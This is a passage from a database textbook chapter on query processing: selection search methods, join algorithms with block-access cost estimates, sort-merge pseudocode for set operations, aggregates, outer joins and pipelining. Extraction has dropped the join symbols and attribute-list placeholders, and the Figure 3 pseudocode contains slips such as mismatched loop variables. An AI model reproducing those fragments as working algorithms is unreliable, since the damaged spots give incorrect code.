of the algorithm, which is:

(2 * b) + (2 * (b * (log2 nR))).

The following sections discuss the various algorithms for the operations of the rela-
tional algebra.

3 Algorithms for SELECT and JOIN Operations

3.1 Implementing the SELECT Operation
There are many algorithms for executing a SELECT operation, which is basically a
search operation to locate the records in a disk file that satisfy a certain condition.
Some of the search algorithms depend on the file having specific access paths, and
they may apply only to certain types of selection conditions. We discuss some of the
algorithms for implementing SELECT in this section. We will use the following
operations, specified on the relational database in Figure A.1, to illustrate our dis-
cussion:

OP1: σSsn = ‘123456789’ (EMPLOYEE)

OP2: σDnumber > 5 (DEPARTMENT)

OP3: σDno = 5 (EMPLOYEE)

OP4: σDno = 5 AND Salary > 30000 AND Sex = ‘F’ (EMPLOYEE)

OP5: σEssn=‘123456789’ AND Pno =10(WORKS_ON)

Search Methods for Simple Selection. A number of search algorithms are
possible for selecting records from a file. These are also known as file scans, because
they scan the records of a file to search for and retrieve records that satisfy a selec-
tion condition.4 If the search algorithm involves the use of an index, the index
search is called an index scan. The following search methods (S1 through S6) are
examples of some of the search algorithms that can be used to implement a select
operation:

■ S1—Linear search (brute force algorithm). Retrieve every record in the file,
and test whether its attribute values satisfy the selection condition. Since the
records are grouped into disk blocks, each disk block is read into a main
memory buffer, and then a search through the records within the disk block
is conducted in main memory.

4A selection operation is sometimes called a filter, since it filters out the records in the file that do not
satisfy the selection condition.

690

Algorithms for Query Processing and Optimization

■ S2—Binary search. If the selection condition involves an equality compari-
son on a key attribute on which the file is ordered, binary search—which is
more efficient than linear search—can be used. An example is OP1 if Ssn is
the ordering attribute for the EMPLOYEE file.5

■ S3a—Using a primary index. If the selection condition involves an equality
comparison on a key attribute with a primary index—for example, Ssn =
‘123456789’ in OP1—use the primary index to retrieve the record. Note that
this condition retrieves a single record (at most).

■ S3b—Using a hash key. If the selection condition involves an equality com-
parison on a key attribute with a hash key—for example, Ssn = ‘123456789’
in OP1—use the hash key to retrieve the record. Note that this condition
retrieves a single record (at most).

■ S4—Using a primary index to retrieve multiple records. If the comparison
condition is >, >=, <, or <= on a key field with a primary index—for exam- ple, Dnumber > 5 in OP2—use the index to find the record satisfying the cor-
responding equality condition (Dnumber = 5), then retrieve all subsequent
records in the (ordered) file. For the condition Dnumber < 5, retrieve all the preceding records. ■ S5—Using a clustering index to retrieve multiple records. If the selection condition involves an equality comparison on a nonkey attribute with a clustering index—for example, Dno = 5 in OP3—use the index to retrieve all the records satisfying the condition. ■ S6—Using a secondary (B+-tree) index on an equality comparison. This search method can be used to retrieve a single record if the indexing field is a key (has unique values) or to retrieve multiple records if the indexing field is not a key. This can also be used for comparisons involving >, >=, <, or <=. In Section 8, we discuss how to develop formulas that estimate the access cost of these search methods in terms of the number of block accesses and access time. Method S1 (linear search) applies to any file, but all the other methods depend on having the appropriate access path on the attribute used in the selection condition. Method S2 (binary search) requires the file to be sorted on the search attribute. The methods that use an index (S3a, S4, S5, and S6) are generally referred to as index searches, and they require the appropriate index to exist on the search attribute. Methods S4 and S6 can be used to retrieve records in a certain range—for example, 30000 <= Salary <= 35000. Queries involving such conditions are called range queries. Search Methods for Complex Selection. If a condition of a SELECT operation is a conjunctive condition—that is, if it is made up of several simple conditions 5Generally, binary search is not used in database searches because ordered files are not used unless they also have a corresponding primary index. 691 Algorithms for Query Processing and Optimization connected with the AND logical connective such as OP4 above—the DBMS can use the following additional methods to implement the operation: ■ S7—Conjunctive selection using an individual index. If an attribute involved in any single simple condition in the conjunctive select condition has an access path that permits the use of one of the methods S2 to S6, use that condition to retrieve the records and then check whether each retrieved record satisfies the remaining simple conditions in the conjunctive select condition. ■ S8—Conjunctive selection using a composite index. If two or more attrib- utes are involved in equality conditions in the conjunctive select condition and a composite index (or hash structure) exists on the combined fields— for example, if an index has been created on the composite key (Essn, Pno) of the WORKS_ON file for OP5—we can use the index directly. ■ S9—Conjunctive selection by intersection of record pointers.6 If second- ary indexes (or other access paths) are available on more than one of the fields involved in simple conditions in the conjunctive select condition, and if the indexes include record pointers (rather than block pointers), then each index can be used to retrieve the set of record pointers that satisfy the indi- vidual condition. The intersection of these sets of record pointers gives the record pointers that satisfy the conjunctive select condition, which are then used to retrieve those records directly. If only some of the conditions have secondary indexes, each retrieved record is further tested to determine whether it satisfies the remaining conditions.7 In general, method S9 assumes that each of the indexes is on a nonkey field of the file, because if one of the conditions is an equality condition on a key field, only one record will satisfy the whole condition. Whenever a single condition specifies the selection—such as OP1, OP2, or OP3— the DBMS can only check whether or not an access path exists on the attribute involved in that condition. If an access path (such as index or hash key or sorted file) exists, the method corresponding to that access path is used; otherwise, the brute force, linear search approach of method S1 can be used. Query optimization for a SELECT operation is needed mostly for conjunctive select conditions whenever more than one of the attributes involved in the conditions have an access path. The optimizer should choose the access path that retrieves the fewest records in the most efficient way by estimating the different costs (see Section 8) and choosing the method with the least estimated cost. Selectivity of a Condition. When the optimizer is choosing between multiple simple conditions in a conjunctive select condition, it typically considers the 6A record pointer uniquely identifies a record and provides the address of the record on disk; hence, it is also called the record identifier or record id. 7The technique can have many variations—for example, if the indexes are logical indexes that store pri- mary key values instead of record pointers. 692 Algorithms for Query Processing and Optimization selectivity of each condition. The selectivity (sl) is defined as the ratio of the num- ber of records (tuples) that satisfy the condition to the total number of records (tuples) in the file (relation), and thus is a number between zero and one. Zero selec- tivity means none of the records in the file satisfies the selection condition, and a selectivity of one means that all the records in the file satisfy the condition. In gen- eral, the selectivity will not be either of these two extremes, but will be a fraction that estimates the percentage of file records that will be retrieved. Although exact selectivities of all conditions may not be available, estimates of selectivities are often kept in the DBMS catalog and are used by the optimizer. For example, for an equality condition on a key attribute of relation r(R), s = 1/|r(R)|, where |r(R)| is the number of tuples in relation r(R). For an equality condition on a nonkey attribute with i distinct values, s can be estimated by (|r(R)|/i)/|r(R)| or 1/i, assuming that the records are evenly or uniformly distributed among the distinct values.8 Under this assumption, |r(R)|/i records will satisfy an equality condition on this attribute. In general, the number of records satisfying a selection condition with selectivity sl is estimated to be |r(R)| * sl. The smaller this estimate is, the higher the desirability of using that condition first to retrieve records. In certain cases, the actual distribution of records among the various distinct values of the attribute is kept by the DBMS in the form of a histogram, in order to get more accurate esti- mates of the number of records that satisfy a particular condition. Disjunctive Selection Conditions. Compared to a conjunctive selection condi- tion, a disjunctive condition (where simple conditions are connected by the OR logical connective rather than by AND) is much harder to process and optimize. For example, consider OP4�: OP4�: σDno=5 OR Salary > 30000 OR Sex=‘F’ (EMPLOYEE)

With such a condition, little optimization can be done, because the records satisfy-
ing the disjunctive condition are the union of the records satisfying the individual
conditions. Hence, if any one of the conditions does not have an access path, we are
compelled to use the brute force, linear search approach. Only if an access path
exists on every simple condition in the disjunction can we optimize the selection by
retrieving the records satisfying each condition—or their record ids—and then
applying the union operation to eliminate duplicates.

A DBMS will have available many of the methods discussed above, and typically
many additional methods. The query optimizer must choose the appropriate one
for executing each SELECT operation in a query. This optimization uses formulas
that estimate the costs for each available access method, as we will discuss in Section
8. The optimizer chooses the access method with the lowest estimated cost.

8In more sophisticated optimizers, histograms representing the distribution of the records among the dif-
ferent attribute values can be kept in the catalog.

693

Algorithms for Query Processing and Optimization

3.2 Implementing the JOIN Operation
The JOIN operation is one of the most time-consuming operations in query pro-
cessing. Many of the join operations encountered in queries are of the EQUIJOIN
and NATURAL JOIN varieties, so we consider just these two here since we are only
giving an overview of query processing and optimization. For the remainder of this
chapter, the term join refers to an EQUIJOIN (or NATURAL JOIN).

There are many possible ways to implement a two-way join, which is a join on two
files. Joins involving more than two files are called multiway joins. The number of
possible ways to execute multiway joins grows very rapidly. In this section we dis-
cuss techniques for implementing only two-way joins. To illustrate our discussion,
we refer to the relational schema in Figure A.1 once more—specifically, to the
EMPLOYEE, DEPARTMENT, and PROJECT relations. The algorithms we discuss next
are for a join operation of the form:

R A=B S

where A and B are the join attributes, which should be domain-compatible attrib-
utes of R and S, respectively. The methods we discuss can be extended to more gen-
eral forms of join. We illustrate four of the most common techniques for
performing such a join, using the following sample operations:

OP6: EMPLOYEE Dno=Dnumber DEPARTMENT
OP7: DEPARTMENT Mgr_ssn=Ssn EMPLOYEE

Methods for Implementing Joins.

■ J1—Nested-loop join (or nested-block join). This is the default (brute
force) algorithm, as it does not require any special access paths on either file
in the join. For each record t in R (outer loop), retrieve every record s from S
(inner loop) and test whether the two records satisfy the join condition
t[A] = s[B].9

■ J2—Single-loop join (using an access structure to retrieve the matching
records). If an index (or hash key) exists for one of the two join attributes—
say, attribute B of file S—retrieve each record t in R (loop over file R), and
then use the access structure (such as an index or a hash key) to retrieve
directly all matching records s from S that satisfy s[B] = t[A].

■ J3—Sort-merge join. If the records of R and S are physically sorted (ordered)
by value of the join attributes A and B, respectively, we can implement the join
in the most efficient way possible. Both files are scanned concurrently in order
of the join attributes, matching the records that have the same values for A and
B. If the files are not sorted, they may be sorted first by using external sorting
(see Section 2). In this method, pairs of file blocks are copied into memory
buffers in order and the records of each file are scanned only once each for

9For disk files, it is obvious that the loops will be over disk blocks, so this technique has also been called
nested-block join.

694

matching with the other file—unless both A and B are nonkey attributes, in
which case the method needs to be modified slightly. A sketch of the sort-
merge join algorithm is given in Figure 3(a). We use R(i) to refer to the ith
record in file R. A variation of the sort-merge join can be used when secondary
indexes exist on both join attributes. The indexes provide the ability to access
(scan) the records in order of the join attributes, but the records themselves are
physically scattered all over the file blocks, so this method may be quite ineffi-
cient, as every record access may involve accessing a different disk block.

■ J4—Partition-hash join. The records of files R and S are partitioned into
smaller files. The partitioning of each file is done using the same hashing
function h on the join attribute A of R (for partitioning file R) and B of S (for
partitioning file S). First, a single pass through the file with fewer records (say,
R) hashes its records to the various partitions of R; this is called the
partitioning phase, since the records of R are partitioned into the hash buck-
ets. In the simplest case, we assume that the smaller file can fit entirely in
main memory after it is partitioned, so that the partitioned subfiles of R are
all kept in main memory. The collection of records with the same value of
h(A) are placed in the same partition, which is a hash bucket in a hash table
in main memory. In the second phase, called the probing phase, a single pass
through the other file (S) then hashes each of its records using the same hash
function h(B) to probe the appropriate bucket, and that record is combined
with all matching records from R in that bucket. This simplified description
of partition-hash join assumes that the smaller of the two files fits entirely into
memory buckets after the first phase. We will discuss the general case of
partition-hash join that does not require this assumption below. In practice,
techniques J1 to J4 are implemented by accessing whole disk blocks of a file,
rather than individual records. Depending on the available number of buffers
in memory, the number of blocks read in from the file can be adjusted.

How Buffer Space and Choice of Outer-Loop File Affect Performance of
Nested-Loop Join. The buffer space available has an important effect on some of
the join algorithms. First, let us consider the nested-loop approach (J1). Looking
again at the operation OP6 above, assume that the number of buffers available in
main memory for implementing the join is nB = 7 blocks (buffers). Recall that we
assume that each memory buffer is the same size as one disk block. For illustration,
assume that the DEPARTMENT file consists of rD = 50 records stored in bD = 10 disk
blocks and that the EMPLOYEE file consists of rE = 6000 records stored in bE = 2000
disk blocks. It is advantageous to read as many blocks as possible at a time into
memory from the file whose records are used for the outer loop (that is, nB − 2
blocks). The algorithm can then read one block at a time for the inner-loop file and
use its records to probe (that is, search) the outer-loop blocks that are currently in
main memory for matching records. This reduces the total number of block
accesses. An extra buffer in main memory is needed to contain the resulting records
after they are joined, and the contents of this result buffer can be appended to the
result file—the disk file that will contain the join result—whenever it is filled. This
result buffer block then is reused to hold additional join result records.

Algorithms for Query Processing and Optimization

695

(a) sort the tuples in R on attribute A; (* assume R has n tuples (records) *)
sort the tuples in S on attribute B; (* assume S has m tuples (records) *)
set i ← 1, j ← 1;
while (i ≤ n) and ( j ≤ m)
do { if R( i ) [A] > S( j ) [B]

then set j ← j + 1
elseif R( i ) [A] < S( j ) [B] then set i ← i + 1 else { (* R( i ) [A] = S( j ) [B], so we output a matched tuple *) output the combined tuple to T;

(* output other tuples that match R(i), if any *)
set I ← j + 1;
while (l ≤ m) and (R( i ) [A] = S( l ) [B])
do { output the combined tuple to T;

set l ← l + 1
}

(* output other tuples that match S(j), if any *)
set k ← i + 1;
while (k ≤ n) and (R(k ) [A] = S( j ) [B])
do { output the combined tuple to T;

set k ← k + 1
}
set i ← k, j ← l

}
}

(b) create a tuple t[] in T� for each tuple t in R;
(* T� contains the projection results before duplicate elimination *)

if includes a key of R
then T ← T �

else { sort the tuples in T �;
set i ← 1, j ← 2;
while i � n
do { output the tuple T �[ i ] to T;

while T�[ i ] = T�[ j ] and j ≤ n do j ← j + 1; (* eliminate duplicates *)
i ← j; j ← i + 1

}
}
(* T contains the projection result after duplicate elimination *) (continues)

Figure 3
Implementing JOIN, PROJECT, UNION, INTERSECTION, and SET DIFFERENCE by
using sort-merge, where R has n tuples and S has m tuples. (a) Implementing the opera-
tion T ← R

A=B
S. (b) Implementing the operation T ← π(R).

Algorithms for Query Processing and Optimization

696

(c) sort the tuples in R and S using the same unique sort attributes;
set i ← 1, j ← 1;
while (i ≤ n) and (j ≤ m)
do { if R( i ) > S( j )

then { output S( j ) to T;
set j ← j + 1

}
elseif R( i ) < S( j ) then { output R( i ) to T; set i ← i + 1 } else set j ← j + 1 (* R(i )=S ( j ) , so we skip one of the duplicate tuples *) } if (i ≤ n) then add tuples R( i ) to R(n) to T; if (j ≤ m) then add tuples S( j ) to S(m) to T; (d) sort the tuples in R and S using the same unique sort attributes; set i ← 1, j ← 1; while ( i ≤ n) and ( j ≤ m) do { if R( i ) > S( j )

then set j ← j + 1
elseif R( i ) < S( j ) then set i ← i + 1 else { output R( j ) to T; (* R( i )=S( j ) , so we output the tuple *) set i ← i + 1, j ← j + 1 } } (e) sort the tuples in R and S using the same unique sort attributes; set i ← 1, j ← 1; while (i � n) and ( j ≤ m) do { if R( i ) > S(j)

then set j ← j + 1
elseif R(i) < S( j ) then { output R( i ) to T; (* R( i ) has no matching S( j ) , so output R( i ) *) set i ← i + 1 } else set i ← i + 1, j ← j + 1 } if (i ≤ n) then add tuples R( i ) to R(n ) to T; Algorithms for Query Processing and Optimization Figure 3 (continued) Implementing JOIN, PROJECT, UNION, INTERSECTION, and SET DIFFERENCE by using sort-merge, where R has n tuples and S has m tuples. (c) Implementing the operation T ← R ∪ S. (d) Implementing the operation T ← R ∩ S. (e) Implementing the operation T ← R – S. 697 Algorithms for Query Processing and Optimization In the nested-loop join, it makes a difference which file is chosen for the outer loop and which for the inner loop. If EMPLOYEE is used for the outer loop, each block of EMPLOYEE is read once, and the entire DEPARTMENT file (each of its blocks) is read once for each time we read in (nB – 2) blocks of the EMPLOYEE file. We get the follow- ing formulas for the number of disk blocks that are read from disk to main memory: Total number of blocks accessed (read) for outer-loop file = bE Number of times (nB − 2) blocks of outer file are loaded into main memory = ⎡bE/(nB – 2)⎤ Total number of blocks accessed (read) for inner-loop file = bD * ⎡bE/(nB – 2)⎤ Hence, we get the following total number of block read accesses: bE + ( ⎡bE/(nB – 2)⎤ * bD) = 2000 + ( ⎡(2000/5)⎤ * 10) = 6000 block accesses On the other hand, if we use the DEPARTMENT records in the outer loop, by symme- try we get the following total number of block accesses: bD + ( ⎡bD/(nB – 2)⎤ * bE) = 10 + ( ⎡(10/5)⎤ * 2000) = 4010 block accesses The join algorithm uses a buffer to hold the joined records of the result file. Once the buffer is filled, it is written to disk and its contents are appended to the result file, and then refilled with join result records.10 If the result file of the join operation has bRES disk blocks, each block is written once to disk, so an additional bRES block accesses (writes) should be added to the preced- ing formulas in order to estimate the total cost of the join operation. The same holds for the formulas developed later for other join algorithms. As this example shows, it is advantageous to use the file with fewer blocks as the outer-loop file in the nested-loop join. How the Join Selection Factor Affects Join Performance. Another factor that affects the performance of a join, particularly the single-loop method J2, is the fraction of records in one file that will be joined with records in the other file. We call this the join selection factor11 of a file with respect to an equijoin condition with another file. This factor depends on the particular equijoin condition between the two files. To illustrate this, consider the operation OP7, which joins each DEPARTMENT record with the EMPLOYEE record for the manager of that depart- ment. Here, each DEPARTMENT record (there are 50 such records in our example) will be joined with a single EMPLOYEE record, but many EMPLOYEE records (the 5,950 of them that do not manage a department) will not be joined with any record from DEPARTMENT. Suppose that secondary indexes exist on both the attributes Ssn of EMPLOYEE and Mgr_ssn of DEPARTMENT, with the number of index levels xSsn = 4 and xMgr_ssn= 2, 10If we reserve two buffers for the result file, double buffering can be used to speed the algorithm. 11This is different from the join selectivity, which we will discuss in Section 8. 698 Algorithms for Query Processing and Optimization respectively. We have two options for implementing method J2. The first retrieves each EMPLOYEE record and then uses the index on Mgr_ssn of DEPARTMENT to find a matching DEPARTMENT record. In this case, no matching record will be found for employees who do not manage a department. The number of block accesses for this case is approximately: bE + (rE * (xMgr_ssn + 1)) = 2000 + (6000 * 3) = 20,000 block accesses The second option retrieves each DEPARTMENT record and then uses the index on Ssn of EMPLOYEE to find a matching manager EMPLOYEE record. In this case, every DEPARTMENT record will have one matching EMPLOYEE record. The number of block accesses for this case is approximately: bD + (rD * (xSsn + 1)) = 10 + (50 * 5) = 260 block accesses The second option is more efficient because the join selection factor of DEPARTMENT with respect to the join condition Ssn = Mgr_ssn is 1 (every record in DEPARTMENT will be joined), whereas the join selection factor of EMPLOYEE with respect to the same join condition is (50/6000), or 0.008 (only 0.8 percent of the records in EMPLOYEE will be joined). For method J2, either the smaller file or the file that has a match for every record (that is, the file with the high join selection fac- tor) should be used in the (single) join loop. It is also possible to create an index specifically for performing the join operation if one does not already exist. The sort-merge join J3 is quite efficient if both files are already sorted by their join attribute. Only a single pass is made through each file. Hence, the number of blocks accessed is equal to the sum of the numbers of blocks in both files. For this method, both OP6 and OP7 would need bE + bD = 2000 + 10 = 2010 block accesses. However, both files are required to be ordered by the join attributes; if one or both are not, a sorted copy of each file must be created specifically for performing the join opera- tion. If we roughly estimate the cost of sorting an external file by (b log2b) block accesses, and if both files need to be sorted, the total cost of a sort-merge join can be estimated by (bE + bD + bE log2bE + bD log2bD). 12 General Case for Partition-Hash Join. The hash-join method J4 is also quite efficient. In this case only a single pass is made through each file, whether or not the files are ordered. If the hash table for the smaller of the two files can be kept entirely in main memory after hashing (partitioning) on its join attribute, the implementa- tion is straightforward. If, however, the partitions of both files must be stored on disk, the method becomes more complex, and a number of variations to improve the efficiency have been proposed. We discuss two techniques: the general case of partition-hash join and a variation called hybrid hash-join algorithm, which has been shown to be quite efficient. In the general case of partition-hash join, each file is first partitioned into M parti- tions using the same partitioning hash function on the join attributes. Then, each 12We can use the more accurate formulas from Section 2 if we know the number of available buffers for sorting. 699 Algorithms for Query Processing and Optimization pair of corresponding partitions is joined. For example, suppose we are joining rela- tions R and S on the join attributes R.A and S.B: R A=B S In the partitioning phase, R is partitioned into the M partitions R1, R2, ..., RM, and S into the M partitions S1, S2, ..., SM. The property of each pair of corresponding partitions Ri, Si with respect to the join operation is that records in Ri only need to be joined with records in Si, and vice versa. This property is ensured by using the same hash function to partition both files on their join attributes—attribute A for R and attribute B for S. The minimum number of in-memory buffers needed for the partitioning phase is M + 1. Each of the files R and S are partitioned separately. During partitioning of a file, M in-memory buffers are allocated to store the records that hash to each partition, and one additional buffer is needed to hold one block at a time of the input file being partitioned. Whenever the in-memory buffer for a par- tition gets filled, its contents are appended to a disk subfile that stores the partition. The partitioning phase has two iterations. After the first iteration, the first file R is partitioned into the subfiles R1, R2, ..., RM, where all the records that hashed to the same buffer are in the same partition. After the second iteration, the second file S is similarly partitioned. In the second phase, called the joining or probing phase, M iterations are needed. During iteration i, two corresponding partitions Ri and Si are joined. The minimum number of buffers needed for iteration i is the number of blocks in the smaller of the two partitions, say Ri, plus two additional buffers. If we use a nested-loop join during iteration i, the records from the smaller of the two partitions Ri are copied into memory buffers; then all blocks from the other partition Si are read—one at a time—and each record is used to probe (that is, search) partition Ri for matching record(s). Any matching records are joined and written into the result file. To improve the efficiency of in-memory probing, it is common to use an in-memory hash table for storing the records in partition Ri by using a different hash function from the partitioning hash function.13 We can approximate the cost of this partition hash-join as 3 * (bR + bS) + bRES for our example, since each record is read once and written back to disk once during the partitioning phase. During the joining (probing) phase, each record is read a second time to perform the join. The main difficulty of this algorithm is to ensure that the partitioning hash function is uniform—that is, the partition sizes are nearly equal in size. If the partitioning function is skewed (nonuniform), then some partitions may be too large to fit in the available memory space for the second joining phase. Notice that if the available in-memory buffer space nB > (bR + 2), where bR is the
number of blocks for the smaller of the two files being joined, say R, then there is no
reason to do partitioning since in this case the join can be performed entirely in
memory using some variation of the nested-loop join based on hashing and probing.

13If the hash function used for partitioning is used again, all records in a partition will hash to the same
bucket again.

700

Algorithms for Query Processing and Optimization

For illustration, assume we are performing the join operation OP6, repeated below:

OP6: EMPLOYEE Dno=Dnumber DEPARTMENT

In this example, the smaller file is the DEPARTMENT file; hence, if the number of
available memory buffers nB > (bD + 2), the whole DEPARTMENT file can be read
into main memory and organized into a hash table on the join attribute. Each
EMPLOYEE block is then read into a buffer, and each EMPLOYEE record in the buffer
is hashed on its join attribute and is used to probe the corresponding in-memory
bucket in the DEPARTMENT hash table. If a matching record is found, the records
are joined, and the result record(s) are written to the result buffer and eventually to
the result file on disk. The cost in terms of block accesses is hence (bD + bE), plus
bRES—the cost of writing the result file.

Hybrid Hash-Join. The hybrid hash-join algorithm is a variation of partition
hash-join, where the joining phase for one of the partitions is included in the
partitioning phase. To illustrate this, let us assume that the size of a memory buffer
is one disk block; that nB such buffers are available; and that the partitioning hash
function used is h(K) = K mod M, so that M partitions are being created, where M
< nB. For illustration, assume we are performing the join operation OP6. In the first pass of the partitioning phase, when the hybrid hash-join algorithm is partitioning the smaller of the two files (DEPARTMENT in OP6), the algorithm divides the buffer space among the M partitions such that all the blocks of the first partition of DEPARTMENT completely reside in main memory. For each of the other partitions, only a single in-memory buffer—whose size is one disk block—is allocated; the remainder of the partition is written to disk as in the regular partition-hash join. Hence, at the end of the first pass of the partitioning phase, the first partition of DEPARTMENT resides wholly in main memory, whereas each of the other partitions of DEPARTMENT resides in a disk subfile. For the second pass of the partitioning phase, the records of the second file being joined—the larger file, EMPLOYEE in OP6—are being partitioned. If a record hashes to the first partition, it is joined with the matching record in DEPARTMENT and the joined records are written to the result buffer (and eventually to disk). If an EMPLOYEE record hashes to a partition other than the first, it is partitioned nor- mally and stored to disk. Hence, at the end of the second pass of the partitioning phase, all records that hash to the first partition have been joined. At this point, there are M − 1 pairs of partitions on disk. Therefore, during the second joining or probing phase, M − 1 iterations are needed instead of M. The goal is to join as many records during the partitioning phase so as to save the cost of storing those records on disk and then rereading them a second time during the joining phase. 4 Algorithms for PROJECT and Set Operations A PROJECT operation π(R) is straightforward to implement if includes a key of relation R, because in this case the result of the operation will

701

Algorithms for Query Processing and Optimization

have the same number of tuples as R, but with only the values for the attributes in
in each tuple. If does not include a key of R, duplicate
tuples must be eliminated. This can be done by sorting the result of the operation and
then eliminating duplicate tuples, which appear consecutively after sorting. A sketch
of the algorithm is given in Figure 3(b). Hashing can also be used to eliminate dupli-
cates: as each record is hashed and inserted into a bucket of the hash file in memory,
it is checked against those records already in the bucket; if it is a duplicate, it is not
inserted in the bucket. It is useful to recall here that in SQL queries, the default is not
to eliminate duplicates from the query result; duplicates are eliminated from the
query result only if the keyword DISTINCT is included.

Set operations—UNION, INTERSECTION, SET DIFFERENCE, and CARTESIAN
PRODUCT—are sometimes expensive to implement. In particular, the CARTESIAN
PRODUCT operation R × S is quite expensive because its result includes a record for
each combination of records from R and S. Also, each record in the result includes
all attributes of R and S. If R has n records and j attributes, and S has m records and
k attributes, the result relation for R × S will have n * m records and each record will
have j + k attributes. Hence, it is important to avoid the CARTESIAN PRODUCT
operation and to substitute other operations such as join during query optimization
(see Section 7).

The other three set operations—UNION, INTERSECTION, and SET
DIFFERENCE14—apply only to type-compatible (or union-compatible) relations,
which have the same number of attributes and the same attribute domains. The cus-
tomary way to implement these operations is to use variations of the sort-merge
technique: the two relations are sorted on the same attributes, and, after sorting, a
single scan through each relation is sufficient to produce the result. For example, we
can implement the UNION operation, R ∪ S, by scanning and merging both sorted
files concurrently, and whenever the same tuple exists in both relations, only one is
kept in the merged result. For the INTERSECTION operation, R ∩ S, we keep in the
merged result only those tuples that appear in both sorted relations. Figure 3(c) to
(e) sketches the implementation of these operations by sorting and merging. Some
of the details are not included in these algorithms.

Hashing can also be used to implement UNION, INTERSECTION, and SET DIFFER-
ENCE. One table is first scanned and then partitioned into an in-memory hash table
with buckets, and the records in the other table are then scanned one at a time and
used to probe the appropriate partition. For example, to implement R ∪ S, first hash
(partition) the records of R; then, hash (probe) the records of S, but do not insert
duplicate records in the buckets. To implement R ∩ S, first partition the records of
R to the hash file. Then, while hashing each record of S, probe to check if an identi-
cal record from R is found in the bucket, and if so add the record to the result file. To
implement R – S, first hash the records of R to the hash file buckets. While hashing
(probing) each record of S, if an identical record is found in the bucket, remove that
record from the bucket.

14SET DIFFERENCE is called EXCEPT in SQL.

702

Algorithms for Query Processing and Optimization

In SQL, there are two variations of these set operations. The operations UNION,
INTERSECTION, and EXCEPT (the SQL keyword for the SET DIFFERENCE opera-
tion) apply to traditional sets, where no duplicate records exist in the result. The
operations UNION ALL, INTERSECTION ALL, and EXCEPT ALL apply to multisets (or
bags), and duplicates are fully considered. Variations of the above algorithms can be
used for the multiset operations in SQL. We leave these as an exercise for the reader.

5 Implementing Aggregate Operations
and OUTER JOINs

5.1 Implementing Aggregate Operations
The aggregate operators (MIN, MAX, COUNT, AVERAGE, SUM), when applied to an
entire table, can be computed by a table scan or by using an appropriate index, if
available. For example, consider the following SQL query:

SELECT MAX(Salary)
FROM EMPLOYEE;

If an (ascending) B+-tree index on Salary exists for the EMPLOYEE relation, then the
optimizer can decide on using the Salary index to search for the largest Salary value
in the index by following the rightmost pointer in each index node from the root to
the rightmost leaf. That node would include the largest Salary value as its last entry.
In most cases, this would be more efficient than a full table scan of EMPLOYEE, since
no actual records need to be retrieved. The MIN function can be handled in a similar
manner, except that the leftmost pointer in the index is followed from the root to
leftmost leaf. That node would include the smallest Salary value as its first entry.

The index could also be used for the AVERAGE and SUM aggregate functions, but
only if it is a dense index—that is, if there is an index entry for every record in the
main file. In this case, the associated computation would be applied to the values in
the index. For a nondense index, the actual number of records associated with each
index value must be used for a correct computation. This can be done if the number
of records associated with each value in the index is stored in each index entry. For the
COUNT aggregate function, the number of values can be also computed from the
index in a similar manner. If a COUNT(*) function is applied to a whole relation, the
number of records currently in each relation are typically stored in the catalog, and
so the result can be retrieved directly from the catalog.

When a GROUP BY clause is used in a query, the aggregate operator must be applied
separately to each group of tuples as partitioned by the grouping attribute. Hence,
the table must first be partitioned into subsets of tuples, where each partition
(group) has the same value for the grouping attributes. In this case, the computa-
tion is more complex. Consider the following query:

SELECT Dno, AVG(Salary)
FROM EMPLOYEE
GROUP BY Dno;

703

Algorithms for Query Processing and Optimization

The usual technique for such queries is to first use either sorting or hashing on the
grouping attributes to partition the file into the appropriate groups. Then the algo-
rithm computes the aggregate function for the tuples in each group, which have the
same grouping attribute(s) value. In the sample query, the set of EMPLOYEE tuples
for each department number would be grouped together in a partition and the aver-
age salary computed for each group.

Notice that if a clustering index exists on the grouping attribute(s), then the
records are already partitioned (grouped) into the appropriate subsets. In this case,
it is only necessary to apply the computation to each group.

5.2 Implementing OUTER JOINs
The outer join operation has three variations: left outer join, right outer join, and full
outer join. These operations can be specified in SQL. The following is an example of
a left outer join operation in SQL:

SELECT Lname, Fname, Dname
FROM (EMPLOYEE LEFT OUTER JOIN DEPARTMENT ON Dno=Dnumber);

The result of this query is a table of employee names and their associated depart-
ments. It is similar to a regular (inner) join result, with the exception that if an
EMPLOYEE tuple (a tuple in the left relation) does not have an associated department,
the employee’s name will still appear in the resulting table, but the department
name would be NULL for such tuples in the query result.

Outer join can be computed by modifying one of the join algorithms, such as
nested-loop join or single-loop join. For example, to compute a left outer join, we
use the left relation as the outer loop or single-loop because every tuple in the left
relation must appear in the result. If there are matching tuples in the other relation,
the joined tuples are produced and saved in the result. However, if no matching
tuple is found, the tuple is still included in the result but is padded with NULL
value(s). The sort-merge and hash-join algorithms can also be extended to compute
outer joins.

Theoretically, outer join can also be computed by executing a combination of rela-
tional algebra operators. For example, the left outer join operation shown above is
equivalent to the following sequence of relational operations:

1. Compute the (inner) JOIN of the EMPLOYEE and DEPARTMENT tables.

TEMP1 ← πLname, Fname, Dname (EMPLOYEE Dno=Dnumber DEPARTMENT)

2. Find the EMPLOYEE tuples that do not appear in the (inner) JOIN result.

TEMP2 ← πLname, Fname (EMPLOYEE) – πLname, Fname (TEMP1)

3. Pad each tuple in TEMP2 with a NULL Dname field.

TEMP2 ← TEMP2 × NULL

704

Algorithms for Query Processing and Optimization

4. Apply the UNION operation to TEMP1, TEMP2 to produce the LEFT OUTER
JOIN result.

RESULT ← TEMP1 ∪ TEMP2

The cost of the outer join as computed above would be the sum of the costs of the
associated steps (inner join, projections, set difference, and union). However, note
that step 3 can be done as the temporary relation is being constructed in step 2; that
is, we can simply pad each resulting tuple with a NULL. In addition, in step 4, we
know that the two operands of the union are disjoint (no common tuples), so there
is no need for duplicate elimination.

6 Combining Operations Using Pipelining
A query specified in SQL will typically be translated into a relational algebra expres-
sion that is a sequence of relational operations. If we execute a single operation at a
time, we must generate temporary files on disk to hold the results of these tempo-
rary operations, creating excessive overhead. Generating and storing large tempo-
rary files on disk is time-consuming and can be unnecessary in many cases, since
these files will immediately be used as input to the next operation. To reduce the
number of temporary files, it is common to generate query execution code that cor-
responds to algorithms for combinations of operations in a query.

For example, rather than being implemented separately, a JOIN can be combined
with two SELECT operations on the input files and a final PROJECT operation on
the resulting file; all this is implemented by one algorithm with two input files and a
single output file. Rather than creating four temporary files, we apply the algorithm
directly and get just one result file. In Section 7.2, we discuss how heuristic rela-
tional algebra optimization can group operations together for execution. This is
called pipelining or stream-based processing.

It is common to create the query execution code dynamically to implement multiple
operations. The generated code for producing the query combines several algo-
rithms that correspond to individual operations. As the result tuples from one oper-
ation are produced, they are provided as input for subsequent operations. For
